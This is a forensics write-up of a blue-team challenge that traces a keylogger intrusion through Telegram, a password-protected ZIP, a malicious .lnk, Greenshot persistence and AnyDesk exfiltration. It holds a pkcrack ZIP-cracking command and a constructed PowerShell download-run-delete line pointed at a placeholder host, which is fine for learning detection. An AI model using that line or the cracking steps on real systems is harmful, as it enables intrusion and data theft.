# KrakenKeylogger Blue Team Challenge
:::success
https://cyberdefenders.org/blueteam-ctf-challenges/119#nav-questions
:::
:::info
Scenario:
An employee at a large company was assigned a task with a two-day deadline. Realizing that he could not complete the task in that timeframe, he sought help from someone else. After one day, he received a notification from that person who informed him that he had managed to finish the assignment and sent it to the employee as a test. However, the person also sent a message to the employee stating that if he wanted the completed assignment, he would have to pay $160.
The helper's demand for payment revealed that he was actually a threat actor. The company's digital forensics team was called in to investigate and identify the attacker, determine the extent of the attack, and assess potential data breaches. The team must analyze the employee's computer and communication logs to prevent similar attacks in the future.
Tools:
[DB Browser](https://sqlitebrowser.org/dl/)
[LECmd](https://ericzimmerman.github.io/#!index.md)
[Timeline Explorer](https://ericzimmerman.github.io/#!index.md)
:::
#### 1. What is the web messaging app the employee used to talk to the attacker?
```
telegram
```
The question specifies a web messaging app, so start with the browser history: the visited URLs show the employee talked to the attacker through Telegram in the browser.

#### 2. What is the password for the protected ZIP file sent by the attacker to the employee?
```
@1122d
```
The challenge provides the encrypted archive project templet test.zip

and also the decrypted contents, projet templet test.

With the plaintext in hand, pkcrack can run a known-plaintext attack (the Biham-Kocher attack on the PKZIP stream cipher) against the archive. Compress projet templet test into project.zip and attack it. Use the 7z2301-x64.exe supplied with the challenge for that step: the attack needs the compressed bytes of the known file to be identical to those inside the encrypted archive, and a different archiver build or compression level produces a different deflate stream, so pkcrack fails. This only works against ZIP's traditional PKWARE encryption (ZipCrypto); AES-encrypted entries are out of reach. In the command below, -C/-c name the encrypted archive and the entry inside it, -P/-p the plaintext archive and the matching entry.
:::info
└─# ../bin/pkcrack -C /home/kali/Desktop/project\ templet\ test.zip -c our\ project\ templet\ test/our\ project\ templet\ test.docx -P /home/kali/Desktop/project.zip -p project\ templet\ test/our\ project\ templet\ test.docx
:::

Once the attack succeeds, the recovered password is @1122d.
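As an added example (not part of the original write-up, and not pkcrack's own code), the following Python builds a ZipCrypto-encrypted archive in memory, validates the cipher by letting the standard library decrypt it with the password, and then runs the checks worth doing before launching pkcrack: traditional encryption rather than AES, the same compression method, and a compressed size of the re-zipped known file equal to the ciphertext minus the 12-byte encryption header. The member name, its contents and the level-0 "wrong archiver" case are constructed; the password is the one recovered above.

```python
# Added example (not from the write-up or pkcrack): minimal ZipCrypto plus the
# preconditions a known-plaintext attack on a ZIP depends on.  Constructed data only.
import functools
import io
import struct
import zipfile
import zlib

# Standard reflected CRC-32 table; ZipCrypto mixes bytes into its keys with it.
_CRC_TABLE = [functools.reduce(lambda c, _: (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1,
                               range(8), i) for i in range(256)]


class ZipCrypto:
    """PKWARE traditional encryption (APPNOTE 6.1).  The keystream depends only on the
    password and the preceding plaintext, so known compressed plaintext leaks keystream."""

    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self._update(b)

    @staticmethod
    def _crc(crc: int, b: int) -> int:
        return _CRC_TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)

    def _update(self, p: int) -> None:
        self.k0 = self._crc(self.k0, p)
        self.k1 = ((self.k1 + (self.k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = self._crc(self.k2, self.k1 >> 24)

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            t = (self.k2 | 2) & 0xFFFF
            out.append(p ^ (((t * (t ^ 1)) >> 8) & 0xFF))
            self._update(p)             # keys advance on the plaintext byte
        return bytes(out)


def _deflate(data: bytes) -> bytes:
    c = zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15)  # raw deflate, as zipfile does
    return c.compress(data) + c.flush()


def build_zipcrypto_archive(name: str, plaintext: bytes, password: bytes) -> bytes:
    """One-member ZIP: deflate, prepend the 12-byte encryption header whose last byte is
    the CRC high byte (the password check byte), encrypt, set general-purpose flag bit 0.
    compress_size includes those 12 header bytes."""
    deflated = _deflate(plaintext)
    crc = zlib.crc32(plaintext) & 0xFFFFFFFF
    body = ZipCrypto(password).encrypt(bytes(11) + bytes([crc >> 24]) + deflated)
    fname, flags, method, t, d = name.encode("ascii"), 0x0001, zipfile.ZIP_DEFLATED, 0x6000, 0x5741
    local = struct.pack("<4s2B4HL2L2H", b"PK\x03\x04", 20, 0, flags, method, t, d,
                        crc, len(body), len(plaintext), len(fname), 0) + fname
    central = struct.pack("<4s4B4HL2L5H2L", b"PK\x01\x02", 20, 0, 20, 0, flags, method, t, d,
                          crc, len(body), len(plaintext), len(fname), 0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<4s4H2LH", b"PK\x05\x06", 0, 0, 1, 1, len(central), len(local) + len(body), 0)
    return local + body + central + eocd


def build_plain_archive(name: str, plaintext: bytes, level=None) -> bytes:
    """Unencrypted archive of the known file, the way an analyst re-zips it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED, compresslevel=level) as zf:
        zf.writestr(name, plaintext)
    return buf.getvalue()


def _has_aes_extra(extra: bytes) -> bool:
    """WinZip AES entries carry extra-field ID 0x9901 (and compression method 99)."""
    while len(extra) >= 4:
        hid, ln = struct.unpack_from("<HH", extra)
        if hid == 0x9901:
            return True
        extra = extra[4 + ln:]
    return False


def plaintext_attack_ready(encrypted_zip: bytes, plain_zip: bytes, member: str) -> dict:
    """Run before pkcrack: the entry must use ZipCrypto (not AES), and the re-compressed
    known file must match the ciphertext byte for byte, so its compressed size must equal
    compress_size minus the 12-byte header.  A different archiver or level breaks this."""
    enc = zipfile.ZipFile(io.BytesIO(encrypted_zip)).getinfo(member)
    pla = zipfile.ZipFile(io.BytesIO(plain_zip)).getinfo(member)
    return {
        "zipcrypto": bool(enc.flag_bits & 1) and enc.compress_type != 99
                     and not _has_aes_extra(enc.extra),
        "same_method": enc.compress_type == pla.compress_type,
        "size_matches": enc.compress_size == pla.compress_size + 12,
    }


def demo() -> dict:
    name, password = "template.docx", b"@1122d"        # constructed name; recovered password
    plaintext = b"Constructed template text for the demo. " * 40
    enc = build_zipcrypto_archive(name, plaintext, password)
    same = build_plain_archive(name, plaintext)            # same zlib, same level
    other = build_plain_archive(name, plaintext, level=0)  # different level: stream differs
    # The stdlib decrypter accepts our archive, which validates the cipher above.
    recovered = zipfile.ZipFile(io.BytesIO(enc)).read(name, pwd=password)
    return {"decrypts": recovered == plaintext,
            "matching": plaintext_attack_ready(enc, same, name),
            "mismatching": plaintext_attack_ready(enc, other, name)}
```

`demo()` reports the matching archive as attackable and the level-0 re-zip as a size mismatch, which is exactly the failure you see when the plaintext is compressed with a different archiver than the one the attacker used.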

References:
https://blog.csdn.net/qq_33265520/article/details/110137117
#### 3. What domain did the attacker use to download the second stage of the malware?
```
masherofmasters.cyou
```
Looking at the extracted files, templet.lnk turns out to be a shortcut whose target runs PowerShell code.

Its contents fetch a file from a remote location with wget (PowerShell's alias for Invoke-WebRequest), run the downloaded file and then delete it. The download location is stored in encoded form.

Paste only the first part, the expression that decodes the download location, into an online PowerShell runner and Write-Output the result. Do not run the rest of the one-liner: it downloads and executes the second stage. If the obfuscation is a plain encoding such as Base64, decoding it offline without running any of the attacker's code is safer still.

Online PowerShell runner:
https://tio.run/#powershell
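Added example, not from the write-up: a static Shell Link (MS-SHLLINK) parser in Python that pulls the command-line arguments out of an .lnk without resolving or executing anything, then decodes a PowerShell -EncodedCommand payload (Base64 of UTF-16LE) and lists the hosts it downloads from. The sample shortcut, its script and the host downloads.example.invalid are constructed here; the challenge's templet.lnk may hide its URL differently, so the -EncodedCommand step is an assumption about this sample only. The code page for non-Unicode shortcuts is assumed to be cp1252.

```python
import base64
import re
import struct
from typing import Dict, List, Optional
from urllib.parse import urlparse

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
FLAG_IDLIST, FLAG_LINKINFO, FLAG_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
# Common spellings of powershell's -EncodedCommand switch, followed by Base64.
ENC_RE = re.compile(r"(?i)(?<!\S)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
URL_RE = re.compile(r"https?://[^\s\"'`;)]+")


def parse_lnk(data: bytes) -> Dict[str, str]:
    """Static MS-SHLLINK parse: validate the header, skip LinkTargetIDList and LinkInfo
    by their own size fields, then read the StringData fields.  The shortcut is never
    resolved or executed.  cp1252 is assumed for non-Unicode shortcuts."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = 0x4C
    if flags & FLAG_IDLIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & FLAG_LINKINFO:
        pos += struct.unpack_from("<I", data, pos)[0]
    width, enc = (2, "utf-16-le") if flags & FLAG_UNICODE else (1, "cp1252")
    fields: Dict[str, str] = {}
    for bit, key in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            fields[key] = data[pos:pos + count * width].decode(enc)
            pos += count * width
    return fields


def decode_encoded_command(arguments: str) -> Optional[str]:
    """Recover the script from a -EncodedCommand argument (Base64 of UTF-16LE)."""
    m = ENC_RE.search(arguments)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None


def download_hosts(script: str) -> List[str]:
    """Hostnames of every URL the decoded script references."""
    hosts = (urlparse(u).hostname for u in URL_RE.findall(script))
    return sorted({h for h in hosts if h})


def build_lnk(arguments: str, relative_path: str = ".\\powershell.exe",
              idlist: bytes = b"", linkinfo: bytes = b"") -> bytes:
    """Constructed test shortcut with Unicode strings.  idlist/linkinfo are opaque
    filler the parser must step over, not real structures."""
    flags, body = 0x08 | 0x20 | FLAG_UNICODE, b""
    if idlist:
        flags |= FLAG_IDLIST
        body += struct.pack("<H", len(idlist)) + idlist
    if linkinfo:
        flags |= FLAG_LINKINFO
        body += struct.pack("<I", 4 + len(linkinfo)) + linkinfo
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    for text in (relative_path, arguments):       # StringData order: RelativePath, Arguments
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


def demo() -> dict:
    # Constructed stage-one script mirroring the behaviour described above: fetch with
    # wget (alias of Invoke-WebRequest), run, delete.  The host is a placeholder.
    script = ('$p="$env:TEMP\\s.exe"; wget "https://downloads.example.invalid/stage2" '
              '-OutFile $p; Start-Process $p; Remove-Item $p')
    b64 = base64.b64encode(script.encode("utf-16-le")).decode()
    lnk = build_lnk(f"-w hidden -nop -ep bypass -enc {b64}",
                    idlist=b"\x14\x00" + bytes(20), linkinfo=bytes(40))
    fields = parse_lnk(lnk)
    decoded = decode_encoded_command(fields["arguments"]) or ""
    return {"arguments": fields["arguments"], "script": decoded,
            "hosts": download_hosts(decoded)}
```

Against a real shortcut, `parse_lnk(open(path, "rb").read())["arguments"]` gives you the PowerShell command line to read by eye; nothing in the file is ever passed to a shell.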
#### 4. What is the name of the command that the attacker injected using one of the installed LOLAPPS on the machine to achieve persistence?
```
jlhgfjhdflghjhuhuh
```
First, a word on LOLAPPS (Living Off The Land Applications): legitimate third-party applications already installed on the target whose own features are abused for execution, persistence or data access, so the attacker needs no dedicated tooling. It belongs to the living-off-the-land (LOTL) family of techniques, although, as here, the payload itself may still be a file on disk.
Searching turns up the LOLAPPS project, which catalogues such applications, and Greenshot, which is installed on the machine in this challenge, is one of them.


Looking up its persistence technique: the attacker edits Greenshot.ini and adds an external command, that is, appends a name to the Commands list in the [ExternalCommand] section together with matching Commandline_<name> and Argument_<name> entries. Greenshot then launches that command line whenever the external command destination is used.



In it we can see (MS Paint is Greenshot's default external command; jlhgfjhdflghjhuhuh is the injected one):
```
Commands=MS Paint,jlhgfjhdflghjhuhuh
```
What is LOLAPPS (Living Off The Land Applications)?
https://lolapps-project.github.io/
https://www.crowdstrike.com/cybersecurity-101/living-off-the-land-attacks-lotl/
#### 5. What is the complete path of the malicious file that the attacker used to achieve persistence?
```
C:\Users\OMEN\AppData\Local\Temp\templet.lnk
```
Following on from the previous question, the Argument_jlhgfjhdflghjhuhuh entry points at C:\Users\OMEN\AppData\Local\Temp\templet.lnk, so Greenshot hands that shortcut to the injected command line, which is how the first stage is re-launched.
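Added example covering questions 4 and 5 (not from the write-up or from Greenshot): Python that reads the [ExternalCommand] section of a Greenshot.ini (kept under %AppData%\Greenshot by default) and flags commands whose command line or argument points at a user-writable location, a script or shortcut, or a script interpreter. The INI fragment is constructed: it reuses the injected name and the Argument_ path from the challenge, but the Commandline_ value for that entry is a placeholder, not recovered evidence.

```python
import configparser
import re
from typing import Dict, List

# Constructed Greenshot.ini fragment.  "MS Paint" is Greenshot's default external
# command.  The second entry reuses the injected name and Argument_ path from the
# challenge; its Commandline_ value here is a placeholder, not recovered evidence.
SAMPLE_INI = r"""
[Core]
Language=en-US

[ExternalCommand]
; The commands that are available.
Commands=MS Paint,jlhgfjhdflghjhuhuh
; The commandline for the output command.
Commandline_MS Paint=C:\Windows\system32\mspaint.exe
Commandline_jlhgfjhdflghjhuhuh=C:\Windows\System32\cmd.exe
; The arguments for the output command.
Argument_MS Paint="{0}"
Argument_jlhgfjhdflghjhuhuh=/c C:\Users\OMEN\AppData\Local\Temp\templet.lnk
"""

PATH_RE = re.compile(r'"([A-Za-z]:\\[^"]+)"|([A-Za-z]:\\\S+)')
USER_WRITABLE = re.compile(r"\\(?:Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)"
                           r"|Users\\Public|ProgramData|Windows\\Temp)\\", re.I)
PAYLOAD_EXT = re.compile(r"\.(?:lnk|ps1|bat|cmd|vbs|vbe|js|jse|hta|wsf|scr)$", re.I)
INTERPRETER = re.compile(r"\\(?:powershell|pwsh|cmd|wscript|cscript|mshta|rundll32"
                         r"|regsvr32|certutil|bitsadmin)\.exe$", re.I)


def load_external_commands(ini_text: str) -> Dict[str, Dict[str, str]]:
    """Map each name in Commands= to its Commandline_<name> / Argument_<name> values."""
    cp = configparser.ConfigParser(delimiters=("=",), comment_prefixes=(";", "#"),
                                   interpolation=None, strict=False,
                                   empty_lines_in_values=False)
    cp.optionxform = str                      # keep key case and spaces intact
    cp.read_string(ini_text)
    if not cp.has_section("ExternalCommand"):
        return {}
    sec = cp["ExternalCommand"]
    names = [n.strip() for n in sec.get("Commands", "").split(",") if n.strip()]
    return {n: {"commandline": sec.get(f"Commandline_{n}", ""),
                "argument": sec.get(f"Argument_{n}", "")} for n in names}


def triage(commands: Dict[str, Dict[str, str]]) -> List[dict]:
    """Flag commands that launch an interpreter, or reference a script/shortcut or a
    user-writable location: none of that is needed to hand a screenshot to an editor."""
    findings = []
    for name, c in commands.items():
        blob = f'{c["commandline"]} {c["argument"]}'
        paths = [m.group(1) or m.group(2) for m in PATH_RE.finditer(blob)]
        reasons = []
        if INTERPRETER.search(c["commandline"].strip().strip('"')):
            reasons.append("interpreter as command")
        if any(USER_WRITABLE.search(p) for p in paths):
            reasons.append("user-writable path")
        if any(PAYLOAD_EXT.search(p) for p in paths):
            reasons.append("script/shortcut payload")
        if reasons:
            findings.append({"name": name, "paths": paths, "reasons": reasons})
    return findings


def demo() -> List[dict]:
    return triage(load_external_commands(SAMPLE_INI))
```

Run `triage(load_external_commands(open(path).read()))` over the Greenshot.ini pulled from the image; the default MS Paint entry stays silent and the injected name comes back with the .lnk path that answers question 5.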
#### 6. What is the name of the application the attacker utilized for data exfiltration?
```
AnyDesk
```
Look at the AnyDesk log file %AppData%\AnyDesk\ad.trace (that is, C:\Users\<user>\AppData\Roaming\AnyDesk\ad.trace; the service-side log %ProgramData%\AnyDesk\ad_svc.trace is worth checking as well). Records related to file transfer can be found by searching for the keyword files:

The search returns many clipboard_files entries; according to the documentation these represent files transferred by copy and paste through the clipboard.

References:
https://support.anydesk.com/zh-tw/knowledge/advanced-options
https://www.inversecos.com/2021/02/forensic-analysis-of-anydesk-logs.html
#### 7. What is the IP address of the attacker?
```
77.232.122.31
```
Look at the AnyDesk log file %AppData%\AnyDesk\ad.trace; it contains several records of connections to the outside. An outgoing connection from this host produces:
➜ app.session - Connecting to [remote anydesk ID]
➜ anynet.any_socket - Connecting to [remote anydesk ID]
➜ anynet.any_socket - Client-ID: [remote anydesk ID]
➜ anynet.any_socket - Logged in from [IP]

Information about external IPs can also be found by searching for the keyword External Address. Note that Logged in from also appears for incoming sessions (typically preceded by an app.prepare_task - Incoming session request line), so check which session block an IP belongs to before attributing it to the attacker.

References:
https://support.anydesk.com/knowledge/trace-files
https://www.inversecos.com/2021/02/forensic-analysis-of-anydesk-logs.html
https://hatsoffsecurity.com/2022/02/28/anydesk-forensic-analysis-and-artefacts/
https://medium.com/mii-cybersec/digital-forensic-artifact-of-anydesk-application-c9b8cfb23ab5
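Added example covering questions 6 and 7 (not from the write-up or from AnyDesk): a Python triage of ad.trace that tracks the session direction from app.prepare_task - Incoming session request and app.session - Connecting to lines, attributes each Logged in from IP to that direction, and counts file-transfer lines (files, which includes clipboard_files). The log lines are constructed to approximate the ad.trace layout and use documentation IP ranges; they are not the challenge's log. Whose address an External address line reports should be confirmed against the surrounding session lines rather than assumed.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed lines approximating the ad.trace layout (level, timestamp, thread
# info, then "module - message").  Documentation IP ranges; not the challenge log.
SAMPLE_TRACE = r"""
    info 2023-10-02 09:14:03.120       lsvc   1432   2211                        app.prepare_task - Incoming session request: attacker@WIN-REMOTE (987654321)
    info 2023-10-02 09:14:04.002       lsvc   1432   2211                     anynet.any_socket - Logged in from 203.0.113.77:51122 on relay 7f2c.
    info 2023-10-02 09:14:04.100       lsvc   1432   2211                     anynet.relay_conn - External address: 198.51.100.23:57000
    info 2023-10-02 09:21:40.877       lsvc   1432   2211                   app.clipboard_files - Preparing files in 'C:\Users\OMEN\Documents'.
    info 2023-10-02 09:21:45.300       lsvc   1432   2211                   app.clipboard_files - Sending 3 files.
    info 2023-10-02 11:02:10.000       back    980   1890                           app.session - Connecting to "123123123".
    info 2023-10-02 11:02:10.400       back    980   1890                     anynet.any_socket - Client-ID: 123123123 (FPR: 9c1e0aa4)
    info 2023-10-02 11:02:11.000       back    980   1890                     anynet.any_socket - Logged in from 192.0.2.9:50101 on relay a1b2.
"""

TS_RE = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}(?:\.\d+)?")
MSG_RE = re.compile(r"([\w.]+) - (.*)$")
IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
RE_INCOMING = re.compile(r"Incoming session request: (\S+) \((\d+)\)")
RE_CONNECTING = re.compile(r"Connecting to \"?(\d+)")
RE_CLIENT_ID = re.compile(r"Client-ID: (\d+)")
RE_LOGGED_IN = re.compile(r"Logged in from " + IP)
RE_EXTERNAL = re.compile(r"External address:? " + IP, re.I)
RE_FILES = re.compile(r"files", re.I)          # covers clipboard_files lines too


def triage_ad_trace(text: str) -> Dict[str, object]:
    """Walk ad.trace in order.  'Incoming session request' and 'Connecting to' set the
    direction of the current session block; the 'Logged in from' IP that follows is
    attributed to it, because that line appears for both directions and on its own
    does not say who initiated the session."""
    timeline: List[Tuple[str, str, str]] = []
    incoming: Set[str] = set()
    outgoing: Set[str] = set()
    external: Set[str] = set()
    remote_ips: Set[Tuple[str, str]] = set()
    files = 0
    direction = "unknown"
    for line in text.splitlines():
        m = MSG_RE.search(line)
        if not m:
            continue
        module, msg = m.groups()
        ts_m = TS_RE.search(line)
        ts = ts_m.group(0) if ts_m else "?"
        hit = RE_INCOMING.search(msg)
        if hit:
            direction = "incoming"
            incoming.add(hit.group(2))
            timeline.append((ts, "incoming request", f"{hit.group(1)} id={hit.group(2)}"))
            continue
        hit = RE_CONNECTING.search(msg)
        if hit:
            direction = "outgoing"
            outgoing.add(hit.group(1))
            timeline.append((ts, "outgoing connect", f"id={hit.group(1)}"))
            continue
        hit = RE_CLIENT_ID.search(msg)
        if hit:
            timeline.append((ts, "peer id", hit.group(1)))
            continue
        hit = RE_LOGGED_IN.search(msg)
        if hit:
            remote_ips.add((direction, hit.group(1)))
            timeline.append((ts, f"{direction} peer ip", hit.group(1)))
            continue
        hit = RE_EXTERNAL.search(msg)
        if hit:
            external.add(hit.group(1))   # whose address this is: confirm against session lines
            timeline.append((ts, "external address", hit.group(1)))
            continue
        if RE_FILES.search(module) or RE_FILES.search(msg):
            files += 1
            timeline.append((ts, "file transfer", f"{module}: {msg}"))
    return {"incoming_ids": sorted(incoming), "outgoing_ids": sorted(outgoing),
            "remote_ips": sorted(remote_ips), "external_addresses": sorted(external),
            "file_transfer_lines": files, "timeline": timeline}


def demo() -> Dict[str, object]:
    return triage_ad_trace(SAMPLE_TRACE)
```

On the real log, `triage_ad_trace(open(path, encoding="utf-8", errors="replace").read())` gives the remote IDs and peer IPs per direction plus a timeline, and the `file transfer` entries bracket the window in which data left the host.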